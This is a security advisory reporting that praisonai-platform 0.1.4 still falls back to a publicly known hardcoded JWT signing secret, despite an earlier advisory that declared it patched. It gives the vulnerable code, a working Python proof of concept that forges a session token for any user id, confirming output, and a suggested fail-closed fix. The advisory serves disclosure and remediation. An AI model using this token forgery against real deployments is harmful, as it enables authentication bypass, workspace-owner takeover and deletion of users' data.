PT-2026-53134 · Pypi · Praisonai-Platform

Published

2026-06-18

·

Updated

2026-06-18

CVSS v3.1

9.8

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Affected: praisonai-platform (PyPI) <= 0.1.4 — including 0.1.4, the version GHSA-3qg8-5g3r-79v5 declares as the patch; main HEAD 8acf77c531e624c46d3d61dcae37e9942e90972c is also affected. File src/praisonai-platform/praisonai platform/services/auth service.py
  • CWE: CWE-1188 (Insecure Default Initialization) + CWE-798 (Use of Hard-coded Credentials) -> CWE-287 (Improper Authentication)

Overview

GHSA-3qg8-5g3r-79v5 (Critical) reported that praisonai-platform's JWT signing secret defaulted to the hardcoded literal "dev-secret-change-me", and that the production guard meant to prevent this was default-open (it only fired when PLATFORM ENV != "dev", but PLATFORM ENV defaults to "dev"). That advisory declares the issue patched in >= 0.1.4. It is not. The shipped praisonai-platform==0.1.4 (and current main) still resolves the signing key to "dev-secret-change-me" in any deployment that does not explicitly set PLATFORM JWT SECRET, because the 0.1.4 change merely duplicated the same default-open guard into a second function instead of failing closed. An unauthenticated attacker reads the literal from the public source, forges a JWT with an arbitrary sub, and is authenticated as that user — including a workspace owner.

Impact

Any deployment that runs praisonai-platform 0.1.4 without explicitly exporting a strong PLATFORM JWT SECRET signs and verifies session JWTs with the publicly known key "dev-secret-change-me". The package's documented entry point — python -m praisonai platform --host 0.0.0.0 --port 8000 (equivalently uvicorn praisonai platform.api.app:app --host 0.0.0.0) — sets neither PLATFORM JWT SECRET nor PLATFORM ENV, so this is the default state, not an edge case. A repository-wide search finds both variables only at the two guard sites and in test fixtures; no shipped Dockerfile, compose file, or deployment doc sets either.
Consequences:
  • Complete authentication bypass (unauthenticated). Knowing only the public default secret read from source, an attacker mints HS256({"sub": , "email": …, "exp": }, "dev-secret-change-me"). The platform's own verifier accepts it and returns an authenticated identity for the attacker-chosen sub — no account and no prior access required. This is the headline defect: the identical break GHSA-3qg8 was scored 9.8 for.
  • Workspace-owner takeover (when a target owner's id is known). Forging the sub of a workspace owner satisfies require workspace member / require workspace owner and the owner-gated routes, yielding owner-level read/update/delete of every resource in that workspace plus member/role management. uuid4 user ids are unguessable, so impersonating a specific owner additionally requires learning that owner's id — which any co-member can read directly from GET /{workspace id}/members (returns List[MemberResponse], each carrying user id and role, to any holder of require workspace member), and which also surfaces in logs and referrals. The end state matches the three Critical advisories of the 0.1.4 wave (this one, plus GHSA-c2m8-4gcg-v22g 9.6 and GHSA-h8q5-cp56-rr65).
  • Resource destruction / lock-out (A:H). Owner impersonation reaches DELETE /workspaces/{workspace id} (gated by require workspace owner), which deletes the entire workspace and every contained resource, and DELETE /{workspace id}/members/{user id}, which evicts legitimate members — irrecoverable denial of the workspace to its rightful users.
  • Affected population: every default (no PLATFORM JWT SECRET) deployment of 0.1.4 — the version users upgrade to specifically because GHSA-3qg8 told them 0.1.4 is fixed.
PR:N / AC:L apply to the authentication-bypass primitive: minting a valid session for a known sub needs no account, only the public secret. Targeted takeover of a specific owner additionally requires that owner's user id (readable by any co-member from the member-list response above, or recoverable from logs / prior exposure); this conditions the highest-impact path but not the bypass itself. The vector matches the PR:N/9.8 GitHub assigned the original GHSA-3qg8 for the identical defect.

Technical Details

All references are to src/praisonai-platform/praisonai platform/... in praisonai-platform==0.1.4 (PyPI sdist) and main HEAD 8acf77c. The two copies of services/auth service.py are byte-identical — sha256 = cc29d43c5412da2c73c818859b8d8b146587842999b777336017ab9d9e509258 for both the shipped 0.1.4 sdist and the HEAD checkout — so the patched release and current main carry the same defect verbatim.
1. Module-load guard is default-open (services/auth service.py:25-34).
python
DEFAULT SECRET = "dev-secret-change-me"
JWT SECRET = os.environ.get("PLATFORM JWT SECRET", DEFAULT SECRET)
JWT ALGORITHM = "HS256"
JWT TTL SECONDS = int(os.environ.get("PLATFORM JWT TTL", str(30 * 24 * 3600)))
if JWT SECRET == DEFAULT SECRET and os.environ.get("PLATFORM ENV", "dev") != "dev":
  raise RuntimeError(
    "PLATFORM JWT SECRET must be set to a strong random value in production. "
    "Set PLATFORM ENV=dev to suppress this check during development."
  )
The raise fires only when PLATFORM ENV != "dev". But os.environ.get("PLATFORM ENV", "dev") defaults to "dev", and PLATFORM ENV is set nowhere in the package or its deployment configuration (a repo-wide search finds PLATFORM ENV only at these two guard sites, and PLATFORM JWT SECRET only here plus in tests/ fixtures that set it explicitly — no Dockerfile, compose file, or doc sets either). So in a clean deployment the predicate is True and ("dev" != "dev") = False; the guard does not fire and JWT SECRET stays "dev-secret-change-me".
2. The 0.1.4 "fix" duplicated the same default-open guard (services/auth service.py:114-128). Instead of failing closed, 0.1.4 added the identical predicate to issue token:
python
def issue token(self, user: User) -> str:
  if JWT SECRET == DEFAULT SECRET and os.environ.get("PLATFORM ENV", "dev") != "dev":
    raise RuntimeError("Refusing to issue JWT with default PLATFORM JWT SECRET outside dev")
  ...
  return jwt.encode(payload, JWT SECRET, algorithm=JWT ALGORITHM)  # signs with the default secret
GHSA-3qg8 states the intended fix is to "fail-closed at import time when the secret is the default, regardless of any environment variable." HEAD does not do that; both guard copies remain gated on the PLATFORM ENV != "dev" condition that is false by default. The advisory's own patch threshold (>= 0.1.4) is therefore incorrect — 0.1.4 is still vulnerable.
3. Verification trusts the forged sub end-to-end (services/auth service.py:131-141 -> api/deps.py:28-73).
python
def verify token(self, token):
  payload = jwt.decode(token, JWT SECRET, algorithms=[JWT ALGORITHM])  # default secret; alg pinned; exp checked
  return AuthIdentity(id=payload["sub"], type="user", email=payload.get("email"), name=payload.get("name"))
get current user (deps.py:28) returns this identity directly; require workspace member (deps.py:54) authorizes purely from member svc.has role(workspace id, identity.id, min role) against the forged sub. Decoding is otherwise sound (HS256 pinned, exp enforced by PyJWT, no verify=False), so the only break is the default secret. No middleware or app-factory check re-validates (api/app.py mounts the routers with per-route Depends(get current user) and no global re-root).
The cross-workspace IDOR (GHSA-h8q5-cp56-rr65) and member-role privilege-escalation (GHSA-c2m8-4gcg-v22g) fixes were reviewed at HEAD and appear complete; this advisory is specific to the JWT-secret guard.

Reproduction

praisonai-platform is a Python server package, so the PoC is a self-contained Python reproducer that installs the shipped 0.1.4 release, simulates a default deployment (no env vars), forges a token with the public default secret, and feeds it to the package's own AuthService. verify token.
bash
mkdir poc && cd poc
pip install --target ./pkgs praisonai-platform==0.1.4 PyJWT
python3 poc.py
python
# poc.py
import os, sys
os.environ.pop("PLATFORM JWT SECRET", None)  # default deployment: secret not set
os.environ.pop("PLATFORM ENV", None)     # default deployment: env not set -> guard default-open
sys.path.insert(0, "./pkgs")

from datetime import datetime, timedelta, timezone
import jwt

VICTIM SUB = "11111111-2222-4333-8444-deadbeefcafe"  # a target user/owner uuid4
now = datetime.now(timezone.utc)
forged = jwt.encode(
  {"sub": VICTIM SUB, "email": "victim@target", "name": "victim",
   "iat": now, "exp": now + timedelta(hours=1)},
  "dev-secret-change-me", algorithm="HS256",    # the public hardcoded default
)

from praisonai platform.services import auth service as A
print("package JWT SECRET (env unset) =", repr(A.JWT SECRET), "| == default?", A.JWT SECRET == "dev-secret-change-me")
identity = A.AuthService. new (A.AuthService). verify token(forged)  # the package's own verifier
print("package verify token(forged) =", identity)
assert identity is not None and identity.id == VICTIM SUB
print("RESULT: CONFIRMED — forged token accepted as victim")

End-to-end (runtime) verification

Observed output, run against the actually-installed praisonai-platform==0.1.4 (the GHSA-3qg8 "patched" release):
text
package JWT SECRET (env unset) = 'dev-secret-change-me' | == default? True
package verify token(forged) = AuthIdentity(id='11111111-2222-4333-8444-deadbeefcafe', type='user', workspace id=None, roles=[], email='victim@target', name='victim', metadata={})
RESULT: CONFIRMED — forged token accepted as victim
This is the package's own verify token (not a re-implementation) returning an authenticated AuthIdentity for an attacker-chosen sub, proving end-to-end that 0.1.4 accepts forged sessions in a default deployment. The intermediate observation (the module-level JWT SECRET equals the public default) and the final sink (the verifier returns the victim identity) were both observed at runtime.

Default-open contrast

Setting only PLATFORM ENV (still no PLATFORM JWT SECRET) makes the same guard fire at import — demonstrating that the only thing protecting a production deployment is an environment variable that defaults to the unsafe value:
bash
PLATFORM ENV=prod python3 -c "import praisonai platform.services.auth service"
text
 File ".../praisonai platform/services/auth service.py", line 31, in <module>
  raise RuntimeError(
RuntimeError: PLATFORM JWT SECRET must be set to a strong random value in production. Set PLATFORM ENV=dev to suppress this check during development.
The guard can fail closed — it simply does not in the default (PLATFORM ENV unset → "dev") state, which is exactly what GHSA-3qg8 reported and 0.1.4 left unchanged.

Suggested Fix

Fail closed, independent of PLATFORM ENV:
python
JWT SECRET = os.environ.get("PLATFORM JWT SECRET")
if not JWT SECRET:
  raise RuntimeError("PLATFORM JWT SECRET must be set to a strong random value; refusing to start with a default key.")
if JWT SECRET == "dev-secret-change-me":
  raise RuntimeError("PLATFORM JWT SECRET is the well-known default; set a unique strong value.")
  • Remove the DEFAULT SECRET fallback entirely (no default signing key), or at minimum raise unconditionally when the secret is the default — do not gate that check on PLATFORM ENV, whose default value ("dev") is precisely what disables the check.
  • Apply the same to the duplicated guard in issue token.
  • Consider generating a random per-process secret only for an explicit, clearly-flagged dev mode (e.g. PLATFORM ENV=dev opt-in), so the safe default is fail-closed.

Disclosure Timeline

  • 2026-05-30: Discovered as an incomplete fix of GHSA-3qg8-5g3r-79v5 while auditing praisonai-platform at main HEAD 8acf77c. Runtime-confirmed against the shipped PyPI release praisonai-platform==0.1.4: a token forged with the public default secret is accepted by the package's own AuthService. verify token.
  • 2026-05-30: Drafted for submission via GitHub Security Advisory (PraisonAI).

References

  • Original advisory (declares 0.1.4 patched): GHSA-3qg8-5g3r-79v5 — "praisonai-platform: JWT signing key defaults to hardcoded dev-secret-change-me … when PLATFORM ENV is unset" (Critical, 9.8).
  • Affected source: src/praisonai-platform/praisonai platform/services/auth service.py:25-34 (module guard), :114-128 ( issue token duplicate guard + sign), :130-141 ( verify token); api/deps.py:28-73 (get current user, require workspace member); api/app.py (router mounting, no global auth re-root).
  • Shipped artifact verified: praisonai-platform==0.1.4 PyPI sdist (pyproject.toml:7 version = "0.1.4"); auth service.py is byte-identical to main HEAD 8acf77c531e624c46d3d61dcae37e9942e90972c (sha256 cc29d43c5412da2c73c818859b8d8b146587842999b777336017ab9d9e509258).
  • Sibling advisories from the same 0.1.4 wave (reviewed, fixes appear complete at HEAD): the wave closed three Critical advisories in total — this one (GHSA-3qg8-5g3r-79v5, 9.8) plus GHSA-c2m8-4gcg-v22g (member-role privilege escalation, 9.6) and GHSA-h8q5-cp56-rr65 (cross-workspace IDOR + role escalation) — alongside several High/Medium IDOR advisories.

Fix

Improper Authentication

Using Hardcoded Credentials

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

GHSA-F38V-77QJ-H4JQ

Affected Products

Praisonai-Platform